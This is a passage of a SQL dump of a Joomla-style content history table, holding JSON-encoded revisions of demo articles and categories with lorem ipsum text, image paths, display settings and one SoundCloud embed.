\"show_print_icon\\\":\\\"\\\",\\\"show_email_icon\\\":\\\"\\\",\\\"show_vote\\\":\\\"\\\",\\\"show_hits\\\":\\\"\\\",\\\"show_noauth\\\":\\\"\\\",\\\"urls_position\\\":\\\"\\\",\\\"alternative_readmore\\\":\\\"\\\",\\\"article_layout\\\":\\\"\\\",\\\"show_publishing_options\\\":\\\"\\\",\\\"show_article_options\\\":\\\"\\\",\\\"show_urls_images_backend\\\":\\\"\\\",\\\"show_urls_images_frontend\\\":\\\"\\\",\\\"post_format\\\":\\\"standard\\\",\\\"gallery\\\":\\\"\\\",\\\"audio\\\":\\\"\\\",\\\"video\\\":\\\"\\\",\\\"link_title\\\":\\\"\\\",\\\"link_url\\\":\\\"\\\",\\\"quote_text\\\":\\\"\\\",\\\"quote_author\\\":\\\"\\\",\\\"post_status\\\":\\\"\\\"}\",\"version\":6,\"ordering\":\"4\",\"metakey\":\"\",\"metadesc\":\"\",\"access\":\"1\",\"hits\":\"96\",\"metadata\":\"{\\\"robots\\\":\\\"\\\",\\\"author\\\":\\\"\\\",\\\"rights\\\":\\\"\\\",\\\"xreference\\\":\\\"\\\"}\",\"featured\":\"0\",\"language\":\"*\",\"xreference\":\"\"}',0),(47,78,1,'','2016-02-28 08:18:09',692,2986,'f0b155d7b77695c969cbc3894af2ec3cab43a5fb','{\"id\":78,\"asset_id\":233,\"title\":\"Portable sales devices making a difference. (2)\",\"alias\":\"portable-sales-devices-making-a-difference-2\",\"introtext\":\"<p>Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Vestibulum tortor quam, feugiat vitae, ultricies eget, tempor sit amet, ante. Donec eu libero sit amet quam egestas semper. Aenean ultricies mi vitae est. Mauris placerat eleifend leo.<\\/p>\\r\\n<p>Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Vestibulum tortor quam, feugiat vitae, ultricies eget, tempor sit amet, ante. Donec eu libero sit amet quam egestas semper. Aenean ultricies mi vitae est. Mauris placerat eleifend leo. Quisque sit amet est et sapien ullamcorper pharetra. Vestibulum erat wisi, condimentum sed, commodo vitae, ornare sit amet, wisi. Aenean fermentum, elit eget tincidunt condimentum, eros ipsum rutrum orci, sagittis tempus lacus enim ac dui. Donec non enim in turpis pulvinar facilisis. Ut felis. Praesent dapibus, neque id cursus faucibus, tortor neque egestas augue, eu vulputate magna eros eu erat. Aliquam erat volutpat. Nam dui mi, tincidunt quis, accumsan porttitor, facilisis luctus, metus<\\/p>\",\"fulltext\":\"\",\"state\":0,\"catid\":\"79\",\"created\":\"2015-02-02 20:29:50\",\"created_by\":\"692\",\"created_by_alias\":\"\",\"modified\":\"2016-02-28 08:18:09\",\"modified_by\":null,\"checked_out\":null,\"checked_out_time\":null,\"publish_up\":\"2015-02-02 20:29:50\",\"publish_down\":\"\",\"images\":\"{\\\"image_intro\\\":\\\"\\\",\\\"float_intro\\\":\\\"\\\",\\\"image_intro_alt\\\":\\\"\\\",\\\"image_intro_caption\\\":\\\"\\\",\\\"image_fulltext\\\":\\\"images\\\\\\/images-06.jpg\\\",\\\"float_fulltext\\\":\\\"\\\",\\\"image_fulltext_alt\\\":\\\"\\\",\\\"image_fulltext_caption\\\":\\\"\\\"}\",\"urls\":\"{\\\"urla\\\":false,\\\"urlatext\\\":\\\"\\\",\\\"targeta\\\":\\\"\\\",\\\"urlb\\\":false,\\\"urlbtext\\\":\\\"\\\",\\\"targetb\\\":\\\"\\\",\\\"urlc\\\":false,\\\"urlctext\\\":\\\"\\\",\\\"targetc\\\":\\\"\\\"}\",\"attribs\":\"{\\\"show_title\\\":\\\"\\\",\\\"link_titles\\\":\\\"\\\",\\\"show_tags\\\":\\\"\\\",\\\"show_intro\\\":\\\"\\\",\\\"info_block_position\\\":\\\"\\\",\\\"show_category\\\":\\\"\\\",\\\"link_category\\\":\\\"\\\",\\\"show_parent_category\\\":\\\"\\\",\\\"link_parent_category\\\":\\\"\\\",\\\"show_author\\\":\\\"\\\",\\\"link_author\\\":\\\"\\\",\\\"show_create_date\\\":\\\"\\\",\\\"show_modify_date\\\":\\\"\\\",\\\"show_publish_date\\\":\\\"\\\",\\\"show_item_navigation\\\":\\\"\\\",\\\"show_icons\\\":\\\"\\\",\\\"show_print_icon\\\":\\\"\\\",\\\"show_email_icon\\\":\\\"\\\",\\\"show_vote\\\":\\\"\\\",\\\"show_hits\\\":\\\"\\\",\\\"show_noauth\\\":\\\"\\\",\\\"urls_position\\\":\\\"\\\",\\\"alternative_readmore\\\":\\\"\\\",\\\"article_layout\\\":\\\"\\\",\\\"show_publishing_options\\\":\\\"\\\",\\\"show_article_options\\\":\\\"\\\",\\\"show_urls_images_backend\\\":\\\"\\\",\\\"show_urls_images_frontend\\\":\\\"\\\",\\\"post_format\\\":\\\"standard\\\",\\\"gallery\\\":\\\"\\\",\\\"audio\\\":\\\"\\\",\\\"video\\\":\\\"\\\",\\\"link_title\\\":\\\"\\\",\\\"link_url\\\":\\\"\\\",\\\"quote_text\\\":\\\"\\\",\\\"quote_author\\\":\\\"\\\",\\\"post_status\\\":\\\"\\\"}\",\"version\":1,\"ordering\":null,\"metakey\":\"\",\"metadesc\":\"\",\"access\":\"1\",\"hits\":null,\"metadata\":\"{\\\"robots\\\":\\\"\\\",\\\"author\\\":\\\"\\\",\\\"rights\\\":\\\"\\\",\\\"xreference\\\":\\\"\\\"}\",\"featured\":\"0\",\"language\":\"*\",\"xreference\":\"\"}',0),(48,78,1,'','2016-02-28 08:18:27',692,2976,'b14371479ff6c68b7b6533c9ee1bbaeb41dce3bf','{\"id\":78,\"asset_id\":\"233\",\"title\":\"Welcome to the future.\",\"alias\":\"welcome-to-the-future\",\"introtext\":\"<p>Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Vestibulum tortor quam, feugiat vitae, ultricies eget, tempor sit amet, ante. Donec eu libero sit amet quam egestas semper. Aenean ultricies mi vitae est. Mauris placerat eleifend leo.<\\/p>\\r\\n<p>Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Vestibulum tortor quam, feugiat vitae, ultricies eget, tempor sit amet, ante. Donec eu libero sit amet quam egestas semper. Aenean ultricies mi vitae est. Mauris placerat eleifend leo. Quisque sit amet est et sapien ullamcorper pharetra. Vestibulum erat wisi, condimentum sed, commodo vitae, ornare sit amet, wisi. Aenean fermentum, elit eget tincidunt condimentum, eros ipsum rutrum orci, sagittis tempus lacus enim ac dui. Donec non enim in turpis pulvinar facilisis. Ut felis. Praesent dapibus, neque id cursus faucibus, tortor neque egestas augue, eu vulputate magna eros eu erat. Aliquam erat volutpat. Nam dui mi, tincidunt quis, accumsan porttitor, facilisis luctus, metus<\\/p>\",\"fulltext\":\"\",\"state\":1,\"catid\":\"79\",\"created\":\"2015-02-02 20:29:50\",\"created_by\":\"692\",\"created_by_alias\":\"\",\"modified\":\"2016-02-28 08:18:27\",\"modified_by\":\"692\",\"checked_out\":\"692\",\"checked_out_time\":\"2016-02-28 08:18:09\",\"publish_up\":\"2015-02-02 20:29:50\",\"publish_down\":\"0000-00-00 00:00:00\",\"images\":\"{\\\"image_intro\\\":\\\"\\\",\\\"float_intro\\\":\\\"\\\",\\\"image_intro_alt\\\":\\\"\\\",\\\"image_intro_caption\\\":\\\"\\\",\\\"image_fulltext\\\":\\\"images\\\\\\/images-06.jpg\\\",\\\"float_fulltext\\\":\\\"\\\",\\\"image_fulltext_alt\\\":\\\"\\\",\\\"image_fulltext_caption\\\":\\\"\\\"}\",\"urls\":\"{\\\"urla\\\":false,\\\"urlatext\\\":\\\"\\\",\\\"targeta\\\":\\\"\\\",\\\"urlb\\\":false,\\\"urlbtext\\\":\\\"\\\",\\\"targetb\\\":\\\"\\\",\\\"urlc\\\":false,\\\"urlctext\\\":\\\"\\\",\\\"targetc\\\":\\\"\\\"}\",\"attribs\":\"{\\\"show_title\\\":\\\"\\\",\\\"link_titles\\\":\\\"\\\",\\\"show_tags\\\":\\\"\\\",\\\"show_intro\\\":\\\"\\\",\\\"info_block_position\\\":\\\"\\\",\\\"show_category\\\":\\\"\\\",\\\"link_category\\\":\\\"\\\",\\\"show_parent_category\\\":\\\"\\\",\\\"link_parent_category\\\":\\\"\\\",\\\"show_author\\\":\\\"\\\",\\\"link_author\\\":\\\"\\\",\\\"show_create_date\\\":\\\"\\\",\\\"show_modify_date\\\":\\\"\\\",\\\"show_publish_date\\\":\\\"\\\",\\\"show_item_navigation\\\":\\\"\\\",\\\"show_icons\\\":\\\"\\\",\\\"show_print_icon\\\":\\\"\\\",\\\"show_email_icon\\\":\\\"\\\",\\\"show_vote\\\":\\\"\\\",\\\"show_hits\\\":\\\"\\\",\\\"show_noauth\\\":\\\"\\\",\\\"urls_position\\\":\\\"\\\",\\\"alternative_readmore\\\":\\\"\\\",\\\"article_layout\\\":\\\"\\\",\\\"show_publishing_options\\\":\\\"\\\",\\\"show_article_options\\\":\\\"\\\",\\\"show_urls_images_backend\\\":\\\"\\\",\\\"show_urls_images_frontend\\\":\\\"\\\",\\\"post_format\\\":\\\"standard\\\",\\\"gallery\\\":\\\"\\\",\\\"audio\\\":\\\"\\\",\\\"video\\\":\\\"\\\",\\\"link_title\\\":\\\"\\\",\\\"link_url\\\":\\\"\\\",\\\"quote_text\\\":\\\"\\\",\\\"quote_author\\\":\\\"\\\",\\\"post_status\\\":\\\"\\\"}\",\"version\":2,\"ordering\":\"0\",\"metakey\":\"\",\"metadesc\":\"\",\"access\":\"1\",\"hits\":\"0\",\"metadata\":\"{\\\"robots\\\":\\\"\\\",\\\"author\\\":\\\"\\\",\\\"rights\\\":\\\"\\\",\\\"xreference\\\":\\\"\\\"}\",\"featured\":\"0\",\"language\":\"*\",\"xreference\":\"\"}',0),(49,75,1,'','2016-02-28 08:19:10',692,4629,'0b9a143779600d9cd639053270f4b20fae402691','{\"id\":75,\"asset_id\":\"199\",\"title\":\"5 Effective Email Unsubscribe Pages.\",\"alias\":\"5-effective-email-unsubscribe-pages\",\"introtext\":\"<p>Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Vestibulum tortor quam, feugiat vitae, ultricies eget, tempor sit amet, ante. Donec eu libero sit amet quam egestas semper. Aenean ultricies mi vitae est. Mauris placerat eleifend leo. Quisque sit amet est et sapien ullamcorper pharetra. Vestibulum erat wisi, condimentum sed, commodo vitae, ornare sit amet, wisi. Aenean fermentum, elit eget tincidunt condimentum, eros ipsum rutrum orci, sagittis tempus lacus enim ac dui. Donec non enim in turpis pulvinar facilisis. Ut felis. Praesent dapibus, neque id cursus faucibus, tortor neque egestas augue, eu vulputate magna eros eu erat. Aliquam erat volutpat. Nam dui mi, tincidunt quis, accumsan porttitor, facilisis luctus, metus<\\/p>\\r\\n<p>Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Vestibulum tortor quam, feugiat vitae, ultricies eget, tempor sit amet, ante. Donec eu libero sit amet quam egestas semper. Aenean ultricies mi vitae est. Mauris placerat eleifend leo. Quisque sit amet est et sapien ullamcorper pharetra. Vestibulum erat wisi, condimentum sed, commodo vitae, ornare sit amet, wisi. Aenean fermentum, elit eget tincidunt condimentum, eros ipsum rutrum orci, sagittis tempus lacus enim ac dui. Donec non enim in turpis pulvinar facilisis. Ut felis. Praesent dapibus, neque id cursus faucibus, tortor neque egestas augue, eu vulputate magna eros eu erat. Aliquam erat volutpat. Nam dui mi, tincidunt quis, accumsan porttitor, facilisis luctus, metus<\\/p>\\r\\n<p>Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Vestibulum tortor quam, feugiat vitae, ultricies eget, tempor sit amet, ante. Donec eu libero sit amet quam egestas semper. Aenean ultricies mi vitae est. Mauris placerat eleifend leo. Quisque sit amet est et sapien ullamcorper pharetra. Vestibulum erat wisi, condimentum sed, commodo vitae, ornare sit amet, wisi. Aenean fermentum, elit eget tincidunt condimentum, eros ipsum rutrum orci, sagittis tempus lacus enim ac dui. Donec non enim in turpis pulvinar facilisis. Ut felis. Praesent dapibus, neque id cursus faucibus, tortor neque egestas augue, eu vulputate magna eros eu erat. Aliquam erat volutpat. Nam dui mi, tincidunt quis, accumsan porttitor, facilisis luctus, metus<\\/p>\",\"fulltext\":\"\",\"state\":1,\"catid\":\"79\",\"created\":\"2015-02-02 20:29:50\",\"created_by\":\"692\",\"created_by_alias\":\"\",\"modified\":\"2016-02-28 08:19:10\",\"modified_by\":\"692\",\"checked_out\":\"692\",\"checked_out_time\":\"2016-02-28 08:18:51\",\"publish_up\":\"2015-02-02 20:29:50\",\"publish_down\":\"0000-00-00 00:00:00\",\"images\":\"{\\\"image_intro\\\":\\\"\\\",\\\"float_intro\\\":\\\"\\\",\\\"image_intro_alt\\\":\\\"\\\",\\\"image_intro_caption\\\":\\\"\\\",\\\"image_fulltext\\\":\\\"images\\\\\\/images-03.jpg\\\",\\\"float_fulltext\\\":\\\"\\\",\\\"image_fulltext_alt\\\":\\\"\\\",\\\"image_fulltext_caption\\\":\\\"\\\"}\",\"urls\":\"{\\\"urla\\\":false,\\\"urlatext\\\":\\\"\\\",\\\"targeta\\\":\\\"\\\",\\\"urlb\\\":false,\\\"urlbtext\\\":\\\"\\\",\\\"targetb\\\":\\\"\\\",\\\"urlc\\\":false,\\\"urlctext\\\":\\\"\\\",\\\"targetc\\\":\\\"\\\"}\",\"attribs\":\"{\\\"show_title\\\":\\\"\\\",\\\"link_titles\\\":\\\"\\\",\\\"show_tags\\\":\\\"\\\",\\\"show_intro\\\":\\\"\\\",\\\"info_block_position\\\":\\\"\\\",\\\"show_category\\\":\\\"\\\",\\\"link_category\\\":\\\"\\\",\\\"show_parent_category\\\":\\\"\\\",\\\"link_parent_category\\\":\\\"\\\",\\\"show_author\\\":\\\"\\\",\\\"link_author\\\":\\\"\\\",\\\"show_create_date\\\":\\\"\\\",\\\"show_modify_date\\\":\\\"\\\",\\\"show_publish_date\\\":\\\"\\\",\\\"show_item_navigation\\\":\\\"\\\",\\\"show_icons\\\":\\\"\\\",\\\"show_print_icon\\\":\\\"\\\",\\\"show_email_icon\\\":\\\"\\\",\\\"show_vote\\\":\\\"\\\",\\\"show_hits\\\":\\\"\\\",\\\"show_noauth\\\":\\\"\\\",\\\"urls_position\\\":\\\"\\\",\\\"alternative_readmore\\\":\\\"\\\",\\\"article_layout\\\":\\\"\\\",\\\"show_publishing_options\\\":\\\"\\\",\\\"show_article_options\\\":\\\"\\\",\\\"show_urls_images_backend\\\":\\\"\\\",\\\"show_urls_images_frontend\\\":\\\"\\\",\\\"post_format\\\":\\\"standard\\\",\\\"gallery\\\":\\\"\\\",\\\"audio\\\":\\\"<iframe width=\\\\\\\"100%\\\\\\\" height=\\\\\\\"450\\\\\\\" scrolling=\\\\\\\"no\\\\\\\" frameborder=\\\\\\\"no\\\\\\\" src=\\\\\\\"https:\\\\\\/\\\\\\/w.soundcloud.com\\\\\\/player\\\\\\/?url=https%3A\\\\\\/\\\\\\/api.soundcloud.com\\\\\\/tracks\\\\\\/28830162&auto_play=false&hide_related=false&show_comments=true&show_user=true&show_reposts=false&visual=true\\\\\\\"><\\\\\\/iframe>\\\",\\\"video\\\":\\\"\\\",\\\"link_title\\\":\\\"\\\",\\\"link_url\\\":\\\"\\\",\\\"quote_text\\\":\\\"\\\",\\\"quote_author\\\":\\\"\\\",\\\"post_status\\\":\\\"\\\"}\",\"version\":8,\"ordering\":\"3\",\"metakey\":\"\",\"metadesc\":\"\",\"access\":\"1\",\"hits\":\"22\",\"metadata\":\"{\\\"robots\\\":\\\"\\\",\\\"author\\\":\\\"\\\",\\\"rights\\\":\\\"\\\",\\\"xreference\\\":\\\"\\\"}\",\"featured\":\"0\",\"language\":\"*\",\"xreference\":\"\"}',0),(50,78,1,'','2016-02-28 08:38:30',692,2999,'fd05fb6898a0e9f271e2754f49ed38239399581b','{\"id\":78,\"asset_id\":\"233\",\"title\":\"Welcome to the future.\",\"alias\":\"welcome-to-the-future\",\"introtext\":\"<p>Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Vestibulum tortor quam, feugiat vitae, ultricies eget, tempor sit amet, ante. Donec eu libero sit amet quam egestas semper. Aenean ultricies mi vitae est. Mauris placerat eleifend leo.<\\/p>\\r\\n<p>Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Vestibulum tortor quam, feugiat vitae, ultricies eget, tempor sit amet, ante. Donec eu libero sit amet quam egestas semper. Aenean ultricies mi vitae est. Mauris placerat eleifend leo. Quisque sit amet est et sapien ullamcorper pharetra. Vestibulum erat wisi, condimentum sed, commodo vitae, ornare sit amet, wisi. Aenean fermentum, elit eget tincidunt condimentum, eros ipsum rutrum orci, sagittis tempus lacus enim ac dui. Donec non enim in turpis pulvinar facilisis. Ut felis. Praesent dapibus, neque id cursus faucibus, tortor neque egestas augue, eu vulputate magna eros eu erat. Aliquam erat volutpat. Nam dui mi, tincidunt quis, accumsan porttitor, facilisis luctus, metus<\\/p>\",\"fulltext\":\"\",\"state\":1,\"catid\":\"79\",\"created\":\"2015-02-02 20:29:50\",\"created_by\":\"692\",\"created_by_alias\":\"\",\"modified\":\"2016-02-28 08:38:30\",\"modified_by\":\"692\",\"checked_out\":\"692\",\"checked_out_time\":\"2016-02-28 08:38:11\",\"publish_up\":\"2015-02-02 20:29:50\",\"publish_down\":\"0000-00-00 00:00:00\",\"images\":\"{\\\"image_intro\\\":\\\"images\\\\\\/images-06.jpg\\\",\\\"float_intro\\\":\\\"\\\",\\\"image_intro_alt\\\":\\\"\\\",\\\"image_intro_caption\\\":\\\"\\\",\\\"image_fulltext\\\":\\\"images\\\\\\/images-06.jpg\\\",\\\"float_fulltext\\\":\\\"\\\",\\\"image_fulltext_alt\\\":\\\"\\\",\\\"image_fulltext_caption\\\":\\\"\\\"}\",\"urls\":\"{\\\"urla\\\":false,\\\"urlatext\\\":\\\"\\\",\\\"targeta\\\":\\\"\\\",\\\"urlb\\\":false,\\\"urlbtext\\\":\\\"\\\",\\\"targetb\\\":\\\"\\\",\\\"urlc\\\":false,\\\"urlctext\\\":\\\"\\\",\\\"targetc\\\":\\\"\\\"}\",\"attribs\":\"{\\\"show_title\\\":\\\"\\\",\\\"link_titles\\\":\\\"\\\",\\\"show_tags\\\":\\\"\\\",\\\"show_intro\\\":\\\"\\\",\\\"info_block_position\\\":\\\"\\\",\\\"show_category\\\":\\\"\\\",\\\"link_category\\\":\\\"\\\",\\\"show_parent_category\\\":\\\"\\\",\\\"link_parent_category\\\":\\\"\\\",\\\"show_author\\\":\\\"\\\",\\\"link_author\\\":\\\"\\\",\\\"show_create_date\\\":\\\"\\\",\\\"show_modify_date\\\":\\\"\\\",\\\"show_publish_date\\\":\\\"\\\",\\\"show_item_navigation\\\":\\\"\\\",\\\"show_icons\\\":\\\"\\\",\\\"show_print_icon\\\":\\\"\\\",\\\"show_email_icon\\\":\\\"\\\",\\\"show_vote\\\":\\\"\\\",\\\"show_hits\\\":\\\"\\\",\\\"show_noauth\\\":\\\"\\\",\\\"urls_position\\\":\\\"\\\",\\\"alternative_readmore\\\":\\\"\\\",\\\"article_layout\\\":\\\"\\\",\\\"show_publishing_options\\\":\\\"\\\",\\\"show_article_options\\\":\\\"\\\",\\\"show_urls_images_backend\\\":\\\"\\\",\\\"show_urls_images_frontend\\\":\\\"\\\",\\\"post_format\\\":\\\"standard\\\",\\\"gallery\\\":\\\"\\\",\\\"audio\\\":\\\"\\\",\\\"video\\\":\\\"\\\",\\\"link_title\\\":\\\"\\\",\\\"link_url\\\":\\\"\\\",\\\"quote_text\\\":\\\"\\\",\\\"quote_author\\\":\\\"\\\",\\\"post_status\\\":\\\"\\\"}\",\"version\":3,\"ordering\":\"0\",\"metakey\":\"\",\"metadesc\":\"\",\"access\":\"1\",\"hits\":\"4\",\"metadata\":\"{\\\"robots\\\":\\\"\\\",\\\"author\\\":\\\"\\\",\\\"rights\\\":\\\"\\\",\\\"xreference\\\":\\\"\\\"}\",\"featured\":\"0\",\"language\":\"*\",\"xreference\":\"\"}',0),(51,86,6,'','2016-02-28 08:41:01',692,567,'616e775ae6dc77178e1093b2d773b95bd2a18e12','{\"id\":86,\"asset_id\":234,\"parent_id\":\"1\",\"lft\":\"105\",\"rgt\":106,\"level\":1,\"path\":null,\"extension\":\"com_content\",\"title\":\"Products\",\"alias\":\"dashlogic-products\",\"note\":\"\",\"description\":\"\",\"published\":\"1\",\"checked_out\":null,\"checked_out_time\":null,\"access\":\"1\",\"params\":\"{\\\"category_layout\\\":\\\"\\\",\\\"image\\\":\\\"\\\",\\\"image_alt\\\":\\\"\\\"}\",\"metadesc\":\"\",\"metakey\":\"\",\"metadata\":\"{\\\"author\\\":\\\"\\\",\\\"robots\\\":\\\"\\\"}\",\"created_user_id\":\"692\",\"created_time\":\"2016-02-28 08:41:01\",\"modified_user_id\":null,\"modified_time\":\"2016-02-28 08:41:01\",\"hits\":\"0\",\"language\":\"*\",\"version\":null}',0),(52,79,1,'','2016-02-28 08:42:00',692,3432,'c7074e85780dedac4e89c8e9b075564efdee46c6','{\"id\":79,\"asset_id\":235,\"title\":\"Baselogic\",\"alias\":\"baselogic\",\"introtext\":\"<p>Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Vestibulum tortor quam, feugiat vitae, ultricies eget, tempor sit amet, ante. Donec eu libero sit amet quam egestas semper. Aenean ultricies mi vitae est. Mauris placerat eleifend leo. Quisque sit amet est et sapien ullamcorper pharetra. Vestibulum erat wisi, condimentum sed, commodo vitae, ornare sit amet, wisi. Aenean fermentum, elit eget tincidunt condimentum, eros ipsum rutrum orci, sagittis tempus lacus enim ac dui. Donec non enim in turpis pulvinar facilisis. Ut felis. Praesent dapibus, neque id cursus faucibus, tortor neque egestas augue, eu vulputate magna eros eu erat. Aliquam erat volutpat. Nam dui mi, tincidunt quis, accumsan porttitor, facilisis luctus, metus<\\/p>\\r\\n<p>Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Vestibulum tortor quam, feugiat vitae, ultricies eget, tempor sit amet, ante. Donec eu libero sit amet quam egestas semper. Aenean ultricies mi vitae est. Mauris placerat eleifend leo. Quisque sit amet est et sapien ullamcorper pharetra. Vestibulum erat wisi, condimentum sed, commodo vitae, ornare sit amet, wisi. Aenean fermentum, elit eget tincidunt condimentum, eros ipsum rutrum orci, sagittis tempus lacus enim ac dui. Donec non enim in turpis pulvinar facilisis. Ut felis. Praesent dapibus, neque id cursus faucibus, tortor neque egestas augue, eu vulputate magna eros eu erat. Aliquam erat volutpat. Nam dui mi, tincidunt quis, accumsan porttitor, facilisis luctus, metus<\\/p>\",\"fulltext\":\"\",\"state\":1,\"catid\":\"86\",\"created\":\"2016-02-28 08:42:00\",\"created_by\":\"692\",\"created_by_alias\":\"\",\"modified\":\"2016-02-28 08:42:00\",\"modified_by\":null,\"checked_out\":null,\"checked_out_time\":null,\"publish_up\":\"2016-02-28 08:42:00\",\"publish_down\":\"0000-00-00 00:00:00\",\"images\":\"{\\\"image_intro\\\":\\\"\\\",\\\"float_intro\\\":\\\"\\\",\\\"image_intro_alt\\\":\\\"\\\",\\\"image_intro_caption\\\":\\\"\\\",\\\"image_fulltext\\\":\\\"images\\\\\\/logo-baselogic.png\\\",\\\"float_fulltext\\\":\\\"\\\",\\\"image_fulltext_alt\\\":\\\"\\\",\\\"image_fulltext_caption\\\":\\\"\\\"}\",\"urls\":\"{\\\"urla\\\":false,\\\"urlatext\\\":\\\"\\\",\\\"targeta\\\":\\\"\\\",\\\"urlb\\\":false,\\\"urlbtext\\\":\\\"\\\",\\\"targetb\\\":\\\"\\\",\\\"urlc\\\":false,\\\"urlctext\\\":\\\"\\\",\\\"targetc\\\":\\\"\\\"}\",\"attribs\":\"{\\\"show_title\\\":\\\"\\\",\\\"link_titles\\\":\\\"\\\",\\\"show_tags\\\":\\\"\\\",\\\"show_intro\\\":\\\"\\\",\\\"info_block_position\\\":\\\"\\\",\\\"show_category\\\":\\\"\\\",\\\"link_category\\\":\\\"\\\",\\\"show_parent_category\\\":\\\"\\\",\\\"link_parent_category\\\":\\\"\\\",\\\"show_author\\\":\\\"\\\",\\\"link_author\\\":\\\"\\\",\\\"show_create_date\\\":\\\"\\\",\\\"show_modify_date\\\":\\\"\\\",\\\"show_publish_date\\\":\\\"\\\",\\\"show_item_navigation\\\":\\\"\\\",\\\"show_icons\\\":\\\"\\\",\\\"show_print_icon\\\":\\\"\\\",\\\"show_email_icon\\\":\\\"\\\",\\\"show_vote\\\":\\\"\\\",\\\"show_hits\\\":\\\"\\\",\\\"show_noauth\\\":\\\"\\\",\\\"urls_position\\\":\\\"\\\",\\\"alternative_readmore\\\":\\\"\\\",\\\"article_layout\\\":\\\"\\\",\\\"show_publishing_options\\\":\\\"\\\",\\\"show_article_options\\\":\\\"\\\",\\\"show_urls_images_backend\\\":\\\"\\\",\\\"show_urls_images_frontend\\\":\\\"\\\",\\\"post_format\\\":\\\"standard\\\",\\\"gallery\\\":\\\"\\\",\\\"audio\\\":\\\"\\\",\\\"video\\\":\\\"\\\",\\\"link_title\\\":\\\"\\\",\\\"link_url\\\":\\\"\\\",\\\"quote_text\\\":\\\"\\\",\\\"quote_author\\\":\\\"\\\",\\\"post_status\\\":\\\"\\\"}\",\"version\":1,\"ordering\":null,\"metakey\":\"\",\"metadesc\":\"\",\"access\":\"1\",\"hits\":null,\"metadata\":\"{\\\"robots\\\":\\\"\\\",\\\"author\\\":\\\"\\\",\\\"rights\\\":\\\"\\\",\\\"xreference\\\":\\\"\\\"}\",\"featured\":\"0\",\"language\":\"*\",\"xreference\":\"\"}',0),(53,80,1,'','2016-02-28 08:42:33',692,3438,'5c5cc5d3bd6fca3177d17faaac88339b8fc452cc','{\"id\":80,\"asset_id\":236,\"title\":\"Clientlogic\",\"alias\":\"clientlogic\",\"introtext\":\"<p>Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Vestibulum tortor quam, feugiat vitae, ultricies eget, tempor sit amet, ante. Donec eu libero sit amet quam egestas semper. Aenean ultricies mi vitae est. Mauris placerat eleifend leo. Quisque sit amet est et sapien ullamcorper pharetra. Vestibulum erat wisi, condimentum sed, commodo vitae, ornare sit amet, wisi. Aenean fermentum, elit eget tincidunt condimentum, eros ipsum rutrum orci, sagittis tempus lacus enim ac dui. Donec non enim in turpis pulvinar facilisis. Ut felis. Praesent dapibus, neque id cursus faucibus, tortor neque egestas augue, eu vulputate magna eros eu erat. Aliquam erat volutpat. Nam dui mi, tincidunt quis, accumsan porttitor, facilisis luctus, metus<\\/p>\\r\\n<p>Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Vestibulum tortor quam, feugiat vitae, ultricies eget, tempor sit amet, ante. Donec eu libero sit amet quam egestas semper. Aenean ultricies mi vitae est. Mauris placerat eleifend leo. Quisque sit amet est et sapien ullamcorper pharetra. Vestibulum erat wisi, condimentum sed, commodo vitae, ornare sit amet, wisi. Aenean fermentum, elit eget tincidunt condimentum, eros ipsum rutrum orci, sagittis tempus lacus enim ac dui. Donec non enim in turpis pulvinar facilisis. Ut felis. Praesent dapibus, neque id cursus faucibus, tortor neque egestas augue, eu vulputate magna eros eu erat. Aliquam erat volutpat. Nam dui mi, tincidunt quis, accumsan porttitor, facilisis luctus, metus<\\/p>\",\"fulltext\":\"\",\"state\":1,\"catid\":\"79\",\"created\":\"2016-02-28 08:42:33\",\"created_by\":\"692\",\"created_by_alias\":\"\",\"modified\":\"2016-02-28 08:42:33\",\"modified_by\":null,\"checked_out\":null,\"checked_out_time\":null,\"publish_up\":\"2016-02-28 08:42:33\",\"publish_down\":\"0000-00-00 00:00:00\",\"images\":\"{\\\"image_intro\\\":\\\"\\\",\\\"float_intro\\\":\\\"\\\",\\\"image_intro_alt\\\":\\\"\\\",\\\"image_intro_caption\\\":\\\"\\\",\\\"image_fulltext\\\":\\\"images\\\\\\/logo-clientlogic.png\\\",\\\"float_fulltext\\\":\\\"\\\",\\\"image_fulltext_alt\\\":\\\"\\\",\\\"image_fulltext_caption\\\":\\\"\\\"}\",\"urls\":\"{\\\"urla\\\":false,\\\"urlatext\\\":\\\"\\\",\\\"targeta\\\":\\\"\\\",\\\"urlb\\\":false,\\\"urlbtext\\\":\\\"\\\",\\\"targetb\\\":\\\"\\\",\\\"urlc\\\":false,\\\"urlctext\\\":\\\"\\\",\\\"targetc\\\":\\\"\\\"}\",\"attribs\":\"{\\\"show_title\\\":\\\"\\\",\\\"link_titles\\\":\\\"\\\",\\\"show_tags\\\":\\\"\\\",\\\"show_intro\\\":\\\"\\\",\\\"info_block_position\\\":\\\"\\\",\\\"show_category\\\":\\\"\\\",\\\"link_category\\\":\\\"\\\",\\\"show_parent_category\\\":\\\"\\\",\\\"link_parent_category\\\":\\\"\\\",\\\"show_author\\\":\\\"\\\",\\\"link_author\\\":\\\"\\\",\\\"show_create_date\\\":\\\"\\\",\\\"show_modify_date\\\":\\\"\\\",\\\"show_publish_date\\\":\\\"\\\",\\\"show_item_navigation\\\":\\\"\\\",\\\"show_icons\\\":\\\"\\\",\\\"show_print_icon\\\":\\\"\\\",\\\"show_email_icon\\\":\\\"\\\",\\\"show_vote\\\":\\\"\\\",\\\"show_hits\\\":\\\"\\\",\\\"show_noauth\\\":\\\"\\\",\\\"urls_position\\\":\\\"\\\",\\\"alternative_readmore\\\":\\\"\\\",\\\"article_layout\\\":\\\"\\\",\\\"show_publishing_options\\\":\\\"\\\",\\\"show_article_options\\\":\\\"\\\",\\\"show_urls_images_backend\\\":\\\"\\\",\\\"show_urls_images_frontend\\\":\\\"\\\",\\\"post_format\\\":\\\"standard\\\",\\\"gallery\\\":\\\"\\\",\\\"audio\